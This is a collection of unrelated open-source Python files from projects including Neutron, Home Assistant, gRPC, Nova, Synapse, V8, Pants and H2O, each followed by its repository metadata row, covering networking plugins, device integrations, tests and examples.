with context.session.begin(subtransactions=True):
floating_ip_orig = super(NeutronPluginPLUMgridV2,
self).get_floatingip(context, id)
floating_ip = super(NeutronPluginPLUMgridV2,
self).update_floatingip(context, id,
floatingip)
try:
LOG.debug(_("PLUMgrid Library: update_floatingip() called"))
self._plumlib.update_floatingip(floating_ip_orig, floating_ip,
id)
except Exception as err_message:
raise plum_excep.PLUMgridException(err_msg=err_message)
return floating_ip
def delete_floatingip(self, context, id):
LOG.debug(_("Neutron PLUMgrid Director: delete_floatingip() called"))
with context.session.begin(subtransactions=True):
floating_ip_orig = super(NeutronPluginPLUMgridV2,
self).get_floatingip(context, id)
super(NeutronPluginPLUMgridV2, self).delete_floatingip(context, id)
try:
LOG.debug(_("PLUMgrid Library: delete_floatingip() called"))
self._plumlib.delete_floatingip(floating_ip_orig, id)
except Exception as err_message:
raise plum_excep.PLUMgridException(err_msg=err_message)
def disassociate_floatingips(self, context, port_id):
LOG.debug(_("Neutron PLUMgrid Director: disassociate_floatingips() "
"called"))
try:
fip_qry = context.session.query(l3_db.FloatingIP)
floating_ip = fip_qry.filter_by(fixed_port_id=port_id).one()
LOG.debug(_("PLUMgrid Library: disassociate_floatingips()"
" called"))
self._plumlib.disassociate_floatingips(floating_ip, port_id)
except sa_exc.NoResultFound:
pass
except Exception as err_message:
raise plum_excep.PLUMgridException(err_msg=err_message)
super(NeutronPluginPLUMgridV2,
self).disassociate_floatingips(context, port_id)
"""
Internal PLUMgrid Fuctions
"""
def _get_plugin_version(self):
return plugin_ver.VERSION
def _port_viftype_binding(self, context, port):
port[portbindings.VIF_TYPE] = portbindings.VIF_TYPE_IOVISOR
port[portbindings.VIF_DETAILS] = {
# TODO(rkukura): Replace with new VIF security details
portbindings.CAP_PORT_FILTER:
'security-group' in self.supported_extension_aliases}
return port
def _network_admin_state(self, network):
if network["network"].get("admin_state_up") is False:
LOG.warning(_("Networks with admin_state_up=False are not "
"supported by PLUMgrid plugin yet."))
return network
def _allocate_pools_for_subnet(self, context, subnet):
"""Create IP allocation pools for a given subnet
Pools are defined by the 'allocation_pools' attribute,
a list of dict objects with 'start' and 'end' keys for
defining the pool range.
Modified from Neutron DB based class
"""
pools = []
# Auto allocate the pool around gateway_ip
net = netaddr.IPNetwork(subnet['cidr'])
first_ip = net.first + 2
last_ip = net.last - 1
gw_ip = int(netaddr.IPAddress(subnet['gateway_ip'] or net.last))
# Use the gw_ip to find a point for splitting allocation pools
# for this subnet
split_ip = min(max(gw_ip, net.first), net.last)
if split_ip > first_ip:
pools.append({'start': str(netaddr.IPAddress(first_ip)),
'end': str(netaddr.IPAddress(split_ip - 1))})
if split_ip < last_ip:
pools.append({'start': str(netaddr.IPAddress(split_ip + 1)),
'end': str(netaddr.IPAddress(last_ip))})
# return auto-generated pools
# no need to check for their validity
return pools
| subramani95/neutron | neutron/plugins/plumgrid/plumgrid_plugin/plumgrid_plugin.py | Python | apache-2.0 | 24,717 |
"""deCONZ scene platform tests."""
from copy import deepcopy
from asynctest import patch
from homeassistant.components import deconz
from homeassistant.setup import async_setup_component
import homeassistant.components.scene as scene
from .test_gateway import ENTRY_CONFIG, DECONZ_WEB_REQUEST, setup_deconz_integration
GROUPS = {
"1": {
"id": "Light group id",
"name": "Light group",
"type": "LightGroup",
"state": {"all_on": False, "any_on": True},
"action": {},
"scenes": [{"id": "1", "name": "Scene"}],
"lights": [],
}
}
async def test_platform_manually_configured(hass):
"""Test that we do not discover anything or try to set up a gateway."""
assert (
await async_setup_component(
hass, scene.DOMAIN, {"scene": {"platform": deconz.DOMAIN}}
)
is True
)
assert deconz.DOMAIN not in hass.data
async def test_no_scenes(hass):
"""Test that scenes can be loaded without scenes being available."""
data = deepcopy(DECONZ_WEB_REQUEST)
gateway = await setup_deconz_integration(
hass, ENTRY_CONFIG, options={}, get_state_response=data
)
assert len(gateway.deconz_ids) == 0
assert len(hass.states.async_all()) == 0
async def test_scenes(hass):
"""Test that scenes works."""
data = deepcopy(DECONZ_WEB_REQUEST)
data["groups"] = deepcopy(GROUPS)
gateway = await setup_deconz_integration(
hass, ENTRY_CONFIG, options={}, get_state_response=data
)
assert "scene.light_group_scene" in gateway.deconz_ids
assert len(hass.states.async_all()) == 1
light_group_scene = hass.states.get("scene.light_group_scene")
assert light_group_scene
group_scene = gateway.api.groups["1"].scenes["1"]
with patch.object(
group_scene, "_async_set_state_callback", return_value=True
) as set_callback:
await hass.services.async_call(
"scene", "turn_on", {"entity_id": "scene.light_group_scene"}, blocking=True
)
await hass.async_block_till_done()
set_callback.assert_called_with("/groups/1/scenes/1/recall", {})
await gateway.async_reset()
assert len(hass.states.async_all()) == 0
| joopert/home-assistant | tests/components/deconz/test_scene.py | Python | apache-2.0 | 2,229 |
"""The Hyperion component."""
from __future__ import annotations
import asyncio
from contextlib import suppress
import logging
from typing import Any, Callable, cast
from awesomeversion import AwesomeVersion
from hyperion import client, const as hyperion_const
from homeassistant.components.camera.const import DOMAIN as CAMERA_DOMAIN
from homeassistant.components.light import DOMAIN as LIGHT_DOMAIN
from homeassistant.components.switch import DOMAIN as SWITCH_DOMAIN
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import CONF_HOST, CONF_PORT, CONF_TOKEN
from homeassistant.core import HomeAssistant, callback
from homeassistant.exceptions import ConfigEntryAuthFailed, ConfigEntryNotReady
from homeassistant.helpers import device_registry as dr
from homeassistant.helpers.dispatcher import (
async_dispatcher_connect,
async_dispatcher_send,
)
from homeassistant.helpers.typing import ConfigType
from .const import (
CONF_INSTANCE_CLIENTS,
CONF_ON_UNLOAD,
CONF_ROOT_CLIENT,
DEFAULT_NAME,
DOMAIN,
HYPERION_RELEASES_URL,
HYPERION_VERSION_WARN_CUTOFF,
SIGNAL_INSTANCE_ADD,
SIGNAL_INSTANCE_REMOVE,
)
PLATFORMS = [LIGHT_DOMAIN, SWITCH_DOMAIN, CAMERA_DOMAIN]
_LOGGER = logging.getLogger(__name__)
# Unique ID
# =========
# A config entry represents a connection to a single Hyperion server. The config entry
# unique_id is the server id returned from the Hyperion instance (a unique ID per
# server).
#
# Each server connection may create multiple entities. The unique_id for each entity is
# <server id>_<instance #>_<name>, where <server_id> will be the unique_id on the
# relevant config entry (as above), <instance #> will be the server instance # and
# <name> will be a unique identifying type name for each entity associated with this
# server/instance (e.g. "hyperion_light").
#
# The get_hyperion_unique_id method will create a per-entity unique id when given the
# server id, an instance number and a name.
# hass.data format
# ================
#
# hass.data[DOMAIN] = {
# <config_entry.entry_id>: {
# "ROOT_CLIENT": <Hyperion Client>,
# "ON_UNLOAD": [<callable>, ...],
# }
# }
def get_hyperion_unique_id(server_id: str, instance: int, name: str) -> str:
"""Get a unique_id for a Hyperion instance."""
return f"{server_id}_{instance}_{name}"
def get_hyperion_device_id(server_id: str, instance: int) -> str:
"""Get an id for a Hyperion device/instance."""
return f"{server_id}_{instance}"
def split_hyperion_unique_id(unique_id: str) -> tuple[str, int, str] | None:
"""Split a unique_id into a (server_id, instance, type) tuple."""
data = tuple(unique_id.split("_", 2))
if len(data) != 3:
return None
try:
return (data[0], int(data[1]), data[2])
except ValueError:
return None
def create_hyperion_client(
*args: Any,
**kwargs: Any,
) -> client.HyperionClient:
"""Create a Hyperion Client."""
return client.HyperionClient(*args, **kwargs)
async def async_create_connect_hyperion_client(
*args: Any,
**kwargs: Any,
) -> client.HyperionClient | None:
"""Create and connect a Hyperion Client."""
hyperion_client = create_hyperion_client(*args, **kwargs)
if not await hyperion_client.async_client_connect():
return None
return hyperion_client
async def async_setup(hass: HomeAssistant, config: ConfigType) -> bool:
"""Set up Hyperion component."""
hass.data[DOMAIN] = {}
return True
@callback
def listen_for_instance_updates(
hass: HomeAssistant,
config_entry: ConfigEntry,
add_func: Callable,
remove_func: Callable,
) -> None:
"""Listen for instance additions/removals."""
hass.data[DOMAIN][config_entry.entry_id][CONF_ON_UNLOAD].extend(
[
async_dispatcher_connect(
hass,
SIGNAL_INSTANCE_ADD.format(config_entry.entry_id),
add_func,
),
async_dispatcher_connect(
hass,
SIGNAL_INSTANCE_REMOVE.format(config_entry.entry_id),
remove_func,
),
]
)
async def async_setup_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool:
"""Set up Hyperion from a config entry."""
host = entry.data[CONF_HOST]
port = entry.data[CONF_PORT]
token = entry.data.get(CONF_TOKEN)
hyperion_client = await async_create_connect_hyperion_client(
host, port, token=token, raw_connection=True
)
# Client won't connect? => Not ready.
if not hyperion_client:
raise ConfigEntryNotReady
version = await hyperion_client.async_sysinfo_version()
if version is not None:
with suppress(ValueError):
if AwesomeVersion(version) < AwesomeVersion(HYPERION_VERSION_WARN_CUTOFF):
_LOGGER.warning(
"Using a Hyperion server version < %s is not recommended -- "
"some features may be unavailable or may not function correctly. "
"Please consider upgrading: %s",
HYPERION_VERSION_WARN_CUTOFF,
HYPERION_RELEASES_URL,
)
# Client needs authentication, but no token provided? => Reauth.
auth_resp = await hyperion_client.async_is_auth_required()
if (
auth_resp is not None
and client.ResponseOK(auth_resp)
and auth_resp.get(hyperion_const.KEY_INFO, {}).get(
hyperion_const.KEY_REQUIRED, False
)
and token is None
):
await hyperion_client.async_client_disconnect()
raise ConfigEntryAuthFailed
# Client login doesn't work? => Reauth.
if not await hyperion_client.async_client_login():
await hyperion_client.async_client_disconnect()
raise ConfigEntryAuthFailed
# Cannot switch instance or cannot load state? => Not ready.
if (
not await hyperion_client.async_client_switch_instance()
or not client.ServerInfoResponseOK(await hyperion_client.async_get_serverinfo())
):
await hyperion_client.async_client_disconnect()
raise ConfigEntryNotReady
# We need 1 root client (to manage instances being removed/added) and then 1 client
# per Hyperion server instance which is shared for all entities associated with
# that instance.
hass.data[DOMAIN][entry.entry_id] = {
CONF_ROOT_CLIENT: hyperion_client,
CONF_INSTANCE_CLIENTS: {},
CONF_ON_UNLOAD: [],
}
async def async_instances_to_clients(response: dict[str, Any]) -> None:
"""Convert instances to Hyperion clients."""
if not response or hyperion_const.KEY_DATA not in response:
return
await async_instances_to_clients_raw(response[hyperion_const.KEY_DATA])
async def async_instances_to_clients_raw(instances: list[dict[str, Any]]) -> None:
"""Convert instances to Hyperion clients."""
device_registry = dr.async_get(hass)
running_instances: set[int] = set()
stopped_instances: set[int] = set()
existing_instances = hass.data[DOMAIN][entry.entry_id][CONF_INSTANCE_CLIENTS]
server_id = cast(str, entry.unique_id)
# In practice, an instance can be in 3 states as seen by this function:
#
# * Exists, and is running: Should be present in HASS/registry.
# * Exists, but is not running: Cannot add it yet, but entity may have be
# registered from a previous time it was running.
# * No longer exists at all: Should not be present in HASS/registry.
# Add instances that are missing.
for instance in instances:
instance_num = instance.get(hyperion_const.KEY_INSTANCE)
if instance_num is None:
continue
if not instance.get(hyperion_const.KEY_RUNNING, False):
stopped_instances.add(instance_num)
continue
running_instances.add(instance_num)
if instance_num in existing_instances:
continue
hyperion_client = await async_create_connect_hyperion_client(
host, port, instance=instance_num, token=token
)
if not hyperion_client:
continue
existing_instances[instance_num] = hyperion_client
instance_name = instance.get(hyperion_const.KEY_FRIENDLY_NAME, DEFAULT_NAME)
async_dispatcher_send(
hass,
SIGNAL_INSTANCE_ADD.format(entry.entry_id),
instance_num,
instance_name,
)
# Remove entities that are are not running instances on Hyperion.
for instance_num in set(existing_instances) - running_instances:
del existing_instances[instance_num]
async_dispatcher_send(
hass, SIGNAL_INSTANCE_REMOVE.format(entry.entry_id), instance_num
)
# Ensure every device associated with this config entry is still in the list of
# motionEye cameras, otherwise remove the device (and thus entities).
known_devices = {
get_hyperion_device_id(server_id, instance_num)
for instance_num in running_instances | stopped_instances
}
for device_entry in dr.async_entries_for_config_entry(
device_registry, entry.entry_id
):
for (kind, key) in device_entry.identifiers:
if kind == DOMAIN and key in known_devices:
break
else:
device_registry.async_remove_device(device_entry.id)
hyperion_client.set_callbacks(
{
f"{hyperion_const.KEY_INSTANCE}-{hyperion_const.KEY_UPDATE}": async_instances_to_clients,
}
)
async def setup_then_listen() -> None:
await asyncio.gather(
*(
hass.config_entries.async_forward_entry_setup(entry, platform)
for platform in PLATFORMS
)
)
assert hyperion_client
if hyperion_client.instances is not None:
await async_instances_to_clients_raw(hyperion_client.instances)
hass.data[DOMAIN][entry.entry_id][CONF_ON_UNLOAD].append(
entry.add_update_listener(_async_entry_updated)
)
hass.async_create_task(setup_then_listen())
return True
async def _async_entry_updated(hass: HomeAssistant, config_entry: ConfigEntry) -> None:
"""Handle entry updates."""
await hass.config_entries.async_reload(config_entry.entry_id)
async def async_unload_entry(hass: HomeAssistant, config_entry: ConfigEntry) -> bool:
"""Unload a config entry."""
unload_ok = await hass.config_entries.async_unload_platforms(
config_entry, PLATFORMS
)
if unload_ok and config_entry.entry_id in hass.data[DOMAIN]:
config_data = hass.data[DOMAIN].pop(config_entry.entry_id)
for func in config_data[CONF_ON_UNLOAD]:
func()
# Disconnect the shared instance clients.
await asyncio.gather(
*(
config_data[CONF_INSTANCE_CLIENTS][
instance_num
].async_client_disconnect()
for instance_num in config_data[CONF_INSTANCE_CLIENTS]
)
)
# Disconnect the root client.
root_client = config_data[CONF_ROOT_CLIENT]
await root_client.async_client_disconnect()
return unload_ok
| sander76/home-assistant | homeassistant/components/hyperion/__init__.py | Python | apache-2.0 | 11,527 |
# Copyright 2019 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""The example of four ways of data transmission using gRPC in Python."""
from threading import Thread
from concurrent import futures
import grpc
import demo_pb2_grpc
import demo_pb2
__all__ = 'DemoServer'
SERVER_ADDRESS = 'localhost:23333'
SERVER_ID = 1
class DemoServer(demo_pb2_grpc.GRPCDemoServicer):
# 一元模式(在一次调用中, 客户端只能向服务器传输一次请求数据, 服务器也只能返回一次响应)
# unary-unary(In a single call, the client can only send request once, and the server can
# only respond once.)
def SimpleMethod(self, request, context):
print("SimpleMethod called by client(%d) the message: %s" %
(request.client_id, request.request_data))
response = demo_pb2.Response(
server_id=SERVER_ID,
response_data="Python server SimpleMethod Ok!!!!")
return response
# 客户端流模式(在一次调用中, 客户端可以多次向服务器传输数据, 但是服务器只能返回一次响应)
# stream-unary (In a single call, the client can transfer data to the server several times,
# but the server can only return a response once.)
def ClientStreamingMethod(self, request_iterator, context):
print("ClientStreamingMethod called by client...")
for request in request_iterator:
print("recv from client(%d), message= %s" %
(request.client_id, request.request_data))
response = demo_pb2.Response(
server_id=SERVER_ID,
response_data="Python server ClientStreamingMethod ok")
return response
# 服务端流模式(在一次调用中, 客户端只能一次向服务器传输数据, 但是服务器可以多次返回响应)
# unary-stream (In a single call, the client can only transmit data to the server at one time,
# but the server can return the response many times.)
def ServerStreamingMethod(self, request, context):
print("ServerStreamingMethod called by client(%d), message= %s" %
(request.client_id, request.request_data))
# 创建一个生成器
# create a generator
def response_messages():
for i in range(5):
response = demo_pb2.Response(
server_id=SERVER_ID,
response_data=("send by Python server, message=%d" % i))
yield response
return response_messages()
# 双向流模式 (在一次调用中, 客户端和服务器都可以向对方多次收发数据)
# stream-stream (In a single call, both client and server can send and receive data
# to each other multiple times.)
def BidirectionalStreamingMethod(self, request_iterator, context):
print("BidirectionalStreamingMethod called by client...")
# 开启一个子线程去接收数据
# Open a sub thread to receive data
def parse_request():
for request in request_iterator:
print("recv from client(%d), message= %s" %
(request.client_id, request.request_data))
t = Thread(target=parse_request)
t.start()
for i in range(5):
yield demo_pb2.Response(
server_id=SERVER_ID,
response_data=("send by Python server, message= %d" % i))
t.join()
def main():
server = grpc.server(futures.ThreadPoolExecutor())
demo_pb2_grpc.add_GRPCDemoServicer_to_server(DemoServer(), server)
server.add_insecure_port(SERVER_ADDRESS)
print("------------------start Python GRPC server")
server.start()
server.wait_for_termination()
# If raise Error:
# AttributeError: '_Server' object has no attribute 'wait_for_termination'
# You can use the following code instead:
# import time
# while 1:
# time.sleep(10)
if __name__ == '__main__':
main()
| jboeuf/grpc | examples/python/data_transmission/server.py | Python | apache-2.0 | 4,492 |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 Pedro Navarro Perez
# Copyright 2013 Cloudbase Solutions Srl
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Management class for Storage-related functions (attach, detach, etc).
"""
import time
from oslo.config import cfg
from nova import exception
from nova.openstack.common import log as logging
from nova.virt import driver
from nova.virt.hyperv import hostutils
from nova.virt.hyperv import vmutils
from nova.virt.hyperv import volumeutils
from nova.virt.hyperv import volumeutilsv2
LOG = logging.getLogger(__name__)
hyper_volumeops_opts = [
cfg.IntOpt('volume_attach_retry_count',
default=10,
help='The number of times to retry to attach a volume'),
cfg.IntOpt('volume_attach_retry_interval',
default=5,
help='Interval between volume attachment attempts, in seconds'),
cfg.BoolOpt('force_volumeutils_v1',
default=False,
help='Force volumeutils v1'),
]
CONF = cfg.CONF
CONF.register_opts(hyper_volumeops_opts, 'hyperv')
CONF.import_opt('my_ip', 'nova.netconf')
class VolumeOps(object):
"""
Management class for Volume-related tasks
"""
def __init__(self):
self._hostutils = hostutils.HostUtils()
self._vmutils = vmutils.VMUtils()
self._volutils = self._get_volume_utils()
self._initiator = None
self._default_root_device = 'vda'
def _get_volume_utils(self):
if(not CONF.hyperv.force_volumeutils_v1 and
self._hostutils.get_windows_version() >= 6.2):
return volumeutilsv2.VolumeUtilsV2()
else:
return volumeutils.VolumeUtils()
def ebs_root_in_block_devices(self, block_device_info):
return self._volutils.volume_in_mapping(self._default_root_device,
block_device_info)
def attach_volumes(self, block_device_info, instance_name, ebs_root):
mapping = driver.block_device_info_get_mapping(block_device_info)
if ebs_root:
self.attach_volume(mapping[0]['connection_info'],
instance_name, True)
mapping = mapping[1:]
for vol in mapping:
self.attach_volume(vol['connection_info'], instance_name)
def login_storage_targets(self, block_device_info):
mapping = driver.block_device_info_get_mapping(block_device_info)
for vol in mapping:
self._login_storage_target(vol['connection_info'])
def _login_storage_target(self, connection_info):
data = connection_info['data']
target_lun = data['target_lun']
target_iqn = data['target_iqn']
target_portal = data['target_portal']
# Check if we already logged in
if self._volutils.get_device_number_for_target(target_iqn, target_lun):
LOG.debug(_("Already logged in on storage target. No need to "
"login. Portal: %(target_portal)s, "
"IQN: %(target_iqn)s, LUN: %(target_lun)s") % locals())
else:
LOG.debug(_("Logging in on storage target. Portal: "
"%(target_portal)s, IQN: %(target_iqn)s, "
"LUN: %(target_lun)s") % locals())
self._volutils.login_storage_target(target_lun, target_iqn,
target_portal)
# Wait for the target to be mounted
self._get_mounted_disk_from_lun(target_iqn, target_lun, True)
def attach_volume(self, connection_info, instance_name, ebs_root=False):
"""
Attach a volume to the SCSI controller or to the IDE controller if
ebs_root is True
"""
LOG.debug(_("Attach_volume: %(connection_info)s to %(instance_name)s")
% locals())
try:
self._login_storage_target(connection_info)
data = connection_info['data']
target_lun = data['target_lun']
target_iqn = data['target_iqn']
#Getting the mounted disk
mounted_disk_path = self._get_mounted_disk_from_lun(target_iqn,
target_lun)
if ebs_root:
#Find the IDE controller for the vm.
ctrller_path = self._vmutils.get_vm_ide_controller(
instance_name, 0)
#Attaching to the first slot
slot = 0
else:
#Find the SCSI controller for the vm
ctrller_path = self._vmutils.get_vm_scsi_controller(
instance_name)
slot = self._get_free_controller_slot(ctrller_path)
self._vmutils.attach_volume_to_controller(instance_name,
ctrller_path,
slot,
mounted_disk_path)
except Exception as exn:
LOG.exception(_('Attach volume failed: %s'), exn)
self._volutils.logout_storage_target(target_iqn)
raise vmutils.HyperVException(_('Unable to attach volume '
'to instance %s') % instance_name)
def _get_free_controller_slot(self, scsi_controller_path):
#Slots starts from 0, so the lenght of the disks gives us the free slot
return self._vmutils.get_attached_disks_count(scsi_controller_path)
def detach_volumes(self, block_device_info, instance_name):
mapping = driver.block_device_info_get_mapping(block_device_info)
for vol in mapping:
self.detach_volume(vol['connection_info'], instance_name)
def logout_storage_target(self, target_iqn):
LOG.debug(_("Logging off storage target %(target_iqn)s") % locals())
self._volutils.logout_storage_target(target_iqn)
def detach_volume(self, connection_info, instance_name):
"""Dettach a volume to the SCSI controller."""
LOG.debug(_("Detach_volume: %(connection_info)s "
"from %(instance_name)s") % locals())
data = connection_info['data']
target_lun = data['target_lun']
target_iqn = data['target_iqn']
#Getting the mounted disk
mounted_disk_path = self._get_mounted_disk_from_lun(target_iqn,
target_lun)
LOG.debug(_("Detaching physical disk from instance: %s"),
mounted_disk_path)
self._vmutils.detach_vm_disk(instance_name, mounted_disk_path)
self.logout_storage_target(target_iqn)
def get_volume_connector(self, instance):
if not self._initiator:
self._initiator = self._volutils.get_iscsi_initiator()
if not self._initiator:
LOG.warn(_('Could not determine iscsi initiator name'),
instance=instance)
return {
'ip': CONF.my_ip,
'initiator': self._initiator,
}
def _get_mounted_disk_from_lun(self, target_iqn, target_lun,
wait_for_device=False):
device_number = self._volutils.get_device_number_for_target(target_iqn,
target_lun)
if device_number is None:
raise exception.NotFound(_('Unable to find a mounted disk for '
'target_iqn: %s') % target_iqn)
LOG.debug(_('Device number: %(device_number)s, '
'target lun: %(target_lun)s') % locals())
#Finding Mounted disk drive
for i in range(0, CONF.hyperv.volume_attach_retry_count):
mounted_disk_path = self._vmutils.get_mounted_disk_by_drive_number(
device_number)
if mounted_disk_path or not wait_for_device:
break
time.sleep(CONF.hyperv.volume_attach_retry_interval)
if not mounted_disk_path:
raise exception.NotFound(_('Unable to find a mounted disk '
'for target_iqn: %s') % target_iqn)
return mounted_disk_path
def disconnect_volume(self, physical_drive_path):
#Get the session_id of the ISCSI connection
session_id = self._volutils.get_session_id_from_mounted_disk(
physical_drive_path)
#Logging out the target
self._volutils.execute_log_out(session_id)
def get_target_from_disk_path(self, physical_drive_path):
return self._volutils.get_target_from_disk_path(physical_drive_path)
| zestrada/nova-cs498cc | nova/virt/hyperv/volumeops.py | Python | apache-2.0 | 9,291 |
# -*- coding: utf-8 -*-
# Copyright 2014 OpenMarket Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# twisted imports
from twisted.internet import defer
# trial imports
from tests import unittest
from synapse.api.constants import Membership
import json
import time
class RestTestCase(unittest.TestCase):
"""Contains extra helper functions to quickly and clearly perform a given
REST action, which isn't the focus of the test.
This subclass assumes there are mock_resource and auth_user_id attributes.
"""
def __init__(self, *args, **kwargs):
super(RestTestCase, self).__init__(*args, **kwargs)
self.mock_resource = None
self.auth_user_id = None
def mock_get_user_by_token(self, token=None):
return self.auth_user_id
@defer.inlineCallbacks
def create_room_as(self, room_creator, is_public=True, tok=None):
temp_id = self.auth_user_id
self.auth_user_id = room_creator
path = "/createRoom"
content = "{}"
if not is_public:
content = '{"visibility":"private"}'
if tok:
path = path + "?access_token=%s" % tok
(code, response) = yield self.mock_resource.trigger("POST", path, content)
self.assertEquals(200, code, msg=str(response))
self.auth_user_id = temp_id
defer.returnValue(response["room_id"])
@defer.inlineCallbacks
def invite(self, room=None, src=None, targ=None, expect_code=200, tok=None):
yield self.change_membership(room=room, src=src, targ=targ, tok=tok,
membership=Membership.INVITE,
expect_code=expect_code)
@defer.inlineCallbacks
def join(self, room=None, user=None, expect_code=200, tok=None):
yield self.change_membership(room=room, src=user, targ=user, tok=tok,
membership=Membership.JOIN,
expect_code=expect_code)
@defer.inlineCallbacks
def leave(self, room=None, user=None, expect_code=200, tok=None):
yield self.change_membership(room=room, src=user, targ=user, tok=tok,
membership=Membership.LEAVE,
expect_code=expect_code)
@defer.inlineCallbacks
def change_membership(self, room, src, targ, membership, tok=None,
expect_code=200):
temp_id = self.auth_user_id
self.auth_user_id = src
path = "/rooms/%s/state/m.room.member/%s" % (room, targ)
if tok:
path = path + "?access_token=%s" % tok
data = {
"membership": membership
}
(code, response) = yield self.mock_resource.trigger("PUT", path,
json.dumps(data))
self.assertEquals(expect_code, code, msg=str(response))
self.auth_user_id = temp_id
@defer.inlineCallbacks
def register(self, user_id):
(code, response) = yield self.mock_resource.trigger(
"POST",
"/register",
json.dumps({
"user": user_id,
"password": "test",
"type": "m.login.password"
}))
self.assertEquals(200, code)
defer.returnValue(response)
@defer.inlineCallbacks
def send(self, room_id, body=None, txn_id=None, tok=None,
expect_code=200):
if txn_id is None:
txn_id = "m%s" % (str(time.time()))
if body is None:
body = "body_text_here"
path = "/rooms/%s/send/m.room.message/%s" % (room_id, txn_id)
content = '{"msgtype":"m.text","body":"%s"}' % body
if tok:
path = path + "?access_token=%s" % tok
(code, response) = yield self.mock_resource.trigger("PUT", path, content)
self.assertEquals(expect_code, code, msg=str(response))
def assert_dict(self, required, actual):
"""Does a partial assert of a dict.
Args:
required (dict): The keys and value which MUST be in 'actual'.
actual (dict): The test result. Extra keys will not be checked.
"""
for key in required:
self.assertEquals(required[key], actual[key],
msg="%s mismatch. %s" % (key, actual))
| rzr/synapse | tests/rest/client/v1/utils.py | Python | apache-2.0 | 4,828 |
# Copyright 2018 the V8 project authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import random
# List of configuration experiments for correctness fuzzing.
# List of <probability>, <1st config name>, <2nd config name>, <2nd d8>.
# Probabilities must add up to 100.
FOOZZIE_EXPERIMENTS = [
[10, 'ignition', 'jitless', 'd8'],
[10, 'ignition', 'slow_path', 'd8'],
[5, 'ignition', 'slow_path_opt', 'd8'],
[30, 'ignition', 'ignition_turbo', 'd8'],
[20, 'ignition', 'ignition_turbo_opt', 'd8'],
[5, 'ignition_turbo_opt', 'ignition_turbo_opt', 'clang_x86/d8'],
[5, 'ignition_turbo', 'ignition_turbo', 'clang_x86/d8'],
[5, 'ignition', 'ignition', 'clang_x86/d8'],
[5, 'ignition', 'ignition', 'clang_x64_v8_arm64/d8'],
[5, 'ignition', 'ignition', 'clang_x86_v8_arm/d8'],
]
class Config(object):
def __init__(self, name, rng=None):
self.name = name
self.rng = rng or random.Random()
def choose_foozzie_flags(self):
"""Randomly chooses a configuration from FOOZZIE_EXPERIMENTS.
Returns: List of flags to pass to v8_foozzie.py fuzz harness.
"""
acc = 0
threshold = self.rng.random() * 100
for prob, first_config, second_config, second_d8 in FOOZZIE_EXPERIMENTS:
acc += prob
if acc > threshold:
return [
'--first-config=' + first_config,
'--second-config=' + second_config,
'--second-d8=' + second_d8,
]
assert False
| weolar/miniblink49 | v8_7_5/tools/clusterfuzz/v8_fuzz_config.py | Python | apache-2.0 | 1,510 |
# coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
from pants_test.pants_run_integration_test import PantsRunIntegrationTest
class ScroogeGenTest(PantsRunIntegrationTest):
@classmethod
def hermetic(cls):
return True
def run_pants(self, command, config=None, stdin_data=None, extra_env=None, **kwargs):
full_config = {
'GLOBAL': {
'pythonpath': ["%(buildroot)s/contrib/scrooge/src/python"],
'backend_packages': ["pants.backend.codegen", "pants.backend.jvm", "pants.contrib.scrooge"]
},
}
if config:
for scope, scoped_cfgs in config.items():
updated = full_config.get(scope, {})
updated.update(scoped_cfgs)
full_config[scope] = updated
return super(ScroogeGenTest, self).run_pants(command, full_config, stdin_data, extra_env,
**kwargs)
@staticmethod
def thrift_test_target(name):
return 'contrib/scrooge/tests/thrift/org/pantsbuild/contrib/scrooge/scrooge_gen:' + name
def test_good(self):
# scrooge_gen should pass with correct thrift files.
cmd = ['gen', self.thrift_test_target('good-thrift')]
pants_run = self.run_pants(cmd)
self.assert_success(pants_run)
def test_namespace_map(self):
# scrooge_gen should pass with namespace_map specified
cmd = ['gen', self.thrift_test_target('namespace-map-thrift')]
pants_run = self.run_pants(cmd)
self.assert_success(pants_run)
def test_default_java_namespace(self):
# scrooge_gen should pass with default_java_namespace specified
cmd = ['gen', self.thrift_test_target('default-java-namespace-thrift')]
pants_run = self.run_pants(cmd)
self.assert_success(pants_run)
def test_include_paths(self):
# scrooge_gen should pass with include_paths specified
cmd = ['gen', self.thrift_test_target('include-paths-thrift')]
pants_run = self.run_pants(cmd)
self.assert_success(pants_run)
| pombredanne/pants | contrib/scrooge/tests/python/pants_test/contrib/scrooge/tasks/test_scrooge_gen_integration.py | Python | apache-2.0 | 2,191 |
# Specify the response and predictor columns
y = "C785"
x = train.names[0:784]
# We encode the response column as categorical for multinomial classification
train[y] = train[y].asfactor()
test[y] = test[y].asfactor()
# Train a Deep Learning model and validate on a test set
model = h2o.deeplearning(x=x,
y=y,
training_frame=train,
validation_frame=test,
distribution="multinomial",
activation="RectifierWithDropout",
hidden=[200,200,200],
input_dropout_ratio=0.2,
l1=1e-5,
epochs=10)
| printedheart/h2o-3 | h2o-docs/src/booklets/v2_2015/source/deeplearning/deeplearning_examplerun.py | Python | apache-2.0 | 719 |
